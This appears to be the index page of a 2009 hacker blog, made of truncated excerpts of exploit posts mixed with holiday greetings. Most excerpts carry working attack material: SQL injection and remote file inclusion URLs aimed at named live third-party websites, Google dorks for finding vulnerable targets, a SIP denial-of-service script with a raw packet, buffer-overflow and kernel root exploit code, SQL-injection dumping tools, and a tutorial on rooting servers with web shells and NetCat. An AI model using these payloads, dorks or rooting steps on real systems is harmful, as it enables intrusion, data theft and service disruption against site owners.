merry christmas 2009 and happy new year 2010

Praying the blessings of the seasonwill refresh you this Christmas andthroughout the coming y...

Read More

Eurologon CMS SQL Injection Vuln

Software : Eurologon Content Management SystemVendor : http://www.content-manager.it/Author : NoGeContact : noge[dot]code[at]gmail[dot]comBlog : http://evilc0de.blogspot.com/[o] Vulnerable filelinks.php[o] Exploithttp://localhost/[path]/links.php?id=[SQL][o] Proof of concepthttp://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*[o] Dork"Powered by Eurologon"[o] Notesthis is a private scri...

Read More

Joomla Component com_lyftenbloggie Remote SQL injection vulnerability

############################################################################################### Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) #### Author : kaMtiEz (kamzcrew[at]yahoo[dot]com) #### Homepage : http://www.indonesiancoder.com #### Date : November 11, 2009 ###############################################################################################[ Software Information ][+] Vendor : http://www.lyften.com/[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html[+]...

Read More

Flashden Shell Upload Vulnerability

# Exploit Title: Flashden Shell Upload Vulnerability# Date: 26.12.2009# Author: DigitALL# Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members# Vendor: http://www.jurgenvisser.nl# Version: 2.0# Dork: inurl:"select_file2.php"# Application: Please Add Files ( Your Shell ) And Upload.# Shell: /test/shell.php -- /up/shell.php -- /upload/shell.php -- /beta/shell.php OR one back d...

Read More

Idul-Adha 1428H

selamat merayakan idul adha 1428...

Read More

Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

!--php/*Spider Solitaire (Windows XP SP2) Local Crash PoCBy SirGodwww.insecurity.rowww.twitter.com/SirGodLoading a corrupt save file(spider.sav) will result in a local crashof Spider Solitaire*/$username="pwn"; //Replace with your computer username$file="spider.sav";$junk="Spider Solitaire Local Crash";$handle = fopen($file, 'w') or die("Can't create file");fwrite($handle,$junk);fclose($handle);$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";if(!copy($file,$file2)){ die("Can't copy file");} else{ echo "File succesfully...

Read More

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python# ZoIPer v2.22 Call-Info Remote Denial Of Service.# Remote Crash P.O.C.# Author: Tomer Bitton (Gr33n_G0bL1n)# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10## Vendor Notified on: 21/09/2009# Vendor Fix: Fixed in version 2.24 Library 5324## Bad Chars: \x20 , \x09import sysimport socketimport osdef main(argc , argv):if len(sys.argv) != 2:os.system("cls")sys.exit("Usage: " + sys.argv[0] + " \n")target_host = sys.argv[1]target_port = 5060evil_packet ="\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"os.system("cls")print...

Read More

PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]Author: Maksymilian Arciemowiczhttp://SecurityReason.comDate:- - Dis.: 10.07.2009- - Pub.: 06.08.2009Risk: HighAffected Software:- - PHP 5.3.0- - PHP 5.2.10Original URL:http://securityreason.com/achievement_securityalert/65- --- 0.Description ---PHP is an HTML-embedded scripting language. Much of its syntax is borrowedfrom C, Java and Perl with a couple of unique PHP-specific features thrownin. The goal of the language is to allow web developers to writedynamically...

Read More

playSMS ver 0.9.4 RFI & LFI Vulnerability

[o]====================================[o][x] playSMS version 0.9.4 [x][x] RFI&LFI Vulnerability [x]Download:http://playsms.sourceforge.net/ 167.9 KBDate : 14 Oct 2009[o]====================================[o]file: /lib/function.php// main functionsinclude "$apps_path[libs]/fn_logger.php"; line 4include "$apps_path[libs]/fn_auth.php"; line 5include "$apps_path[libs]/fn_user.php"; line 6include "$apps_path[libs]/fn_sendsms.php"; line 7include "$apps_path[libs]/fn_sendmail.php";...

Read More

jasakom has been hacked

...

Read More

Redcat Media SQL Injection Vulnerability

x]==========================================[x]| AntiSecurity[dot]org |[x]==========================================[x][x]==========================================[x]| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability| Vendor : http://www.redcatmedia.co.uk/| Date : 2 oktober 2009 ( Indonesia )| Author : s4va| Contact : sava_sword@yahoo.com| Blog : http://s4vaworld.uni.cc[x]==========================================[x]| Dork : “Powered...

Read More

Community Translate RFI Vuln

[o] Community Translate Remote File Inclusion VulnerabilitySoftware : Community TranslateProject Home : http://code.google.com/p/communitytranslate/Author : NoGeContact : noge[dot]code[at]gmail[dot]comBlog : http://evilc0de.blogspot.com/Home : http://antisecurity.org/[o] Vulnerable filerequire_once("$rd/include/utilfunctions.php");include/functions.php[o] Exploithttp://localhost/[path]/include/functions.php?rd=[evilc0...

Read More

Dazzle Blast RFI Vuln

[o] Dazzle Blast Remote File Inclusion VulnerabilitySoftware : Dazzle BlastDownload : http://www.dazzleblast.com/dazzleblast.zipAuthor : NoGeContact : noge[dot]code[at]gmail[dot]comBlog : http://evilc0de.blogspot.com/Home : http://antisecurity.org/[o] Vulnerable filerequire_once($ROOTDIR.'admin/functions/general.php');admin/includes/createemails.php[o] Exploithttp://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0...

Read More

Simple SQLi Dumper (SSDp) v0.1 GUI

take from c0li.m0de.0n <? #!/usr/bin/perl # Simple SQLi Dumper (SSDp) v2.2 # Coded by Vrs-hCk # ander[at]antisecurity.org # Anti Security Team # Example: http://localhost/index.php?id=-1+union+select+1,2,3,c0li,5 use HTTP::Request; use LWP::UserAgent; my $c0de = "0x63306C69"; my $logo = "SSDp"; print "\n *************************************\n"; print " * ...

Read More

Metasploit Framework

Metasploit provides useful information to people who perform penetration testing,IDS signature development, and exploit research. This project was created toprovide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and informationon this site are provided for legal security researchand testing purposes only.Metasploit is a community project managed by Metasploit LLC.Metasploit 3.3 for WIN.32Metasploit 3.3 for U...

Read More

BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

#!/usr/bin/env python########################################################################## BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2# Found By: Dr_IDE# Tested: XPSP3# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.#########################################################################buff = ("\x41" * 10000)f1 = open("BigAntPlugIn.zip","w")f1.write(buff)f1.clos...

Read More

Mambo/Joomla SQL Injection Vulneralbility

######################################################### Mambo/Joomla SQL Injection Vulneralbility #### Component : com_tupinambis #### Release : September 23, 2009 #### --------------------------------------------------####.---..-..-..-.,-..-..-..-. .---..---..---..----. ####`| |'| || || . < | || || |__ | |- \ \ `| |'| || | #### `-' `----'`-'`-'`----'`----'`---'`---' `-' `----' ####-------------------------------------------------- #########################################################[+] Author : Don Tukulesto[+] Homepage : http://www.indonesiancoder.com[+]...

Read More

Joomla Component com_fastball (league) Remote SQL Injection Vulnerability

############################################################################################################### Joomla Component com_fastball Remote SQL injection vulnerability -(league) #### Author : kaMtiEz (kamzcrew[at]gmail[dot]com) #### Homepage : http://www.indonesiancoder.com #### Date : September 23, 2009 ################################################################################################################ Hello My Name Is :### __ _____ __ ._____________### | | _______ / \_/ |_|__\_ _____/_______### | |/ /\__ \ / \ / \ __\ ||...

Read More

How to hide your IP

I know many of you hiding ip's via Socks or poxy..that's shit...sorry but if they have java they can get ur ip even if u are connected thrhough a socks.So. If u have a good connection at internet you can use this softwares:1. Local ip > AOL ( using aol 9.1 or AOL desktop 10.)To configure your ip to use AOL USA ip class you have to do go to:Open Aol 9.1 > Connection options > Advanced Broadband Settings > continue > & at Broadband u will see something " You are curently editing settings for Broadband, than click and go down to...

Read More

Happy Eid-Ul Fitr 1430

Words by words here might hurt you once even more. In case, We need to apologize to you on it.Translation (lol) : SAYA MATTHEWS MENGUCAPKAN SELAMAT HARI RAYA IDUL FITRI 1430 H MOHON MAAF LAHIR BA...

Read More

IMS SiteManager Blind SQL Injection Vuln

[o]------------------------------------------------------------------------------------[x] | Blind SQL Injection Vulnerability |[o]------------------------------------------------------------------------------------[o] | Software : IMS SiteManager | | Vendor : www.sitemanager.ims.net | | Date : 13 sept 2009 | | Author : zxvf | | Contact : paddy[at]antisecurity[dot]org |[o]------------------------------------------------------------------------------------[o][?] Google Dork "Powered by IMS SiteManager"[?] Exploit ...

Read More

ExpressLink™ SEO Blind SQL Injection Vuln

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>* Details *<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>> type :: ( menu_list.php?cid=...

Read More

BSR Webweaver Version 1.33 /Scripts access restriction bypass

[*] Date: 15/09/09[*] http://www.brswebweaver.com/downloads.html[*] Attack type : Remote[*] Patch Status : Unpatched[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error response occurs ! Now to bypass and check the directory listing [That is if Directory Browsing is allowed in the server Configuration !] just copy and paste the exploit url !.This is the reason this exploit is not called a Directory...

Read More

How to Use John the Ripper

In this config we going to use John the Ripper’s password cracker to enhance the security of your server by choosing a proper password for your system. This config assumes that you have already installed John the Ripper’s password cracker. If you haven’t installed it then please go to install Password cracker - John the Ripper now.Create test userFor testing purposes you should create a testing user “johnripper” with password “password”.adduser johnripper Image:johnripper01.jpg Crack passwordJohn the Ripper’s password cracker needs to access...

Read More

Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)

/* second verse, same as the first CVE-2009-2698 udp_sendmsg(), x86/x64 Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at NULL and finding it executed This exploit is a bit more nuanced and thoughtful ;) use ./therebel.sh for everything At this moment, when each of us must fit an arrow to his bow and enter the lists anew, to reconquer, within history and in spite of it, that which he owns already, the thin yield of his fields, the brief love of the earth, at this moment when at last a man is born, it is time...

Read More

IndexScript 3.0 SQL Injection Vuln

[o] IndexScript 3.0 SQL Injection VulnerabilitySoftware : IndexScript version 3.0Vendor : http://www.indexscript.com/Download : http://www.indexscript.com/download.phpAuthor : NoGeHome : http://antisecurity.org[o] Vulnerable filemore.php[o] Exploithttp://localhost/[path]/more.php?cat_id=[SQL][o] Proof of Concepthttp://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--[o] Dork"powered by...

Read More

Sourcode sqltools.php

code sql tools <?set_time_limit(0);error_reporting(0);$fungsi=strip_tags($_POST['fungsi']);$url=strip_tags($_POST['url']);$db=strip_tags($_POST['db']);$table=strip_tags($_POST['table']);$column=strip_tags($_POST['column']);$start=strip_tags($_POST['start']);$stop=strip_tags($_POST['stop']); $target=strip_tags($_POST['target']); ?> <title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title> <head> </head> <script> function show(id){ document.getElementById(id).style.display="block"; } function hide(id){...

Read More

Local Root via NetCat

take from BABY CORPYou will need:Quote:- Vulnerable Site in R.F.I.- Shell for R.F.I. (e.g. c99, r57 or other)- NetCat- Local Root Exploit (depending on the kernel and the version)This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF.Suppose that we have found a site with RFI vulnerability:Code:http://www.hackedsite.com/folder/index.html?page=e can run shell exploiting Remote File Inclusion, as follows:Code:http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?where...

Read More

Agoko CMS <= 0.4 remote commands execution exploit

#!/usr/bin/perlprint q~--------------------------------------------------Agoko CMS <= 0.4 remote commands execution exploitby stakermail: staker[at]hotmail[dot]it--------------------------------------------------[*] Usage -> perl [xpl.pl] [host] [path][*] Example -> perl agk.pl localhost /Agoko~; #>-----------<##>- Working -<##>-----------<########################################## staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko ## ## --------------------------------------------------...

Read More

Finding vulnerabilities in PHP scripts FULL ( with examples )

Name : Finding vulnerabilities in PHP scripts FULL ( with examples ) Author : SirGod Email : sirgod08[at]gmail[dot]com Contents : 1) About 2) Some stuff 3) Remote File Inclusion 3.0 - Basic example 3.1 - Simple example 3.2 - How to fix 4) Local File Inclusion 4.0 - Basic example 4.1 - Simple example 4.2 - How to fix 5) Local File Disclosure/Download 5.0 - Basic example 5.1 - Simple example 5.2 - How to fix 6) SQL Injection 6.0 - Basic example 6.1 - Simple example 6.2 - SQL Login Bypass 6.3 - How to fix 7) Insecure...

Read More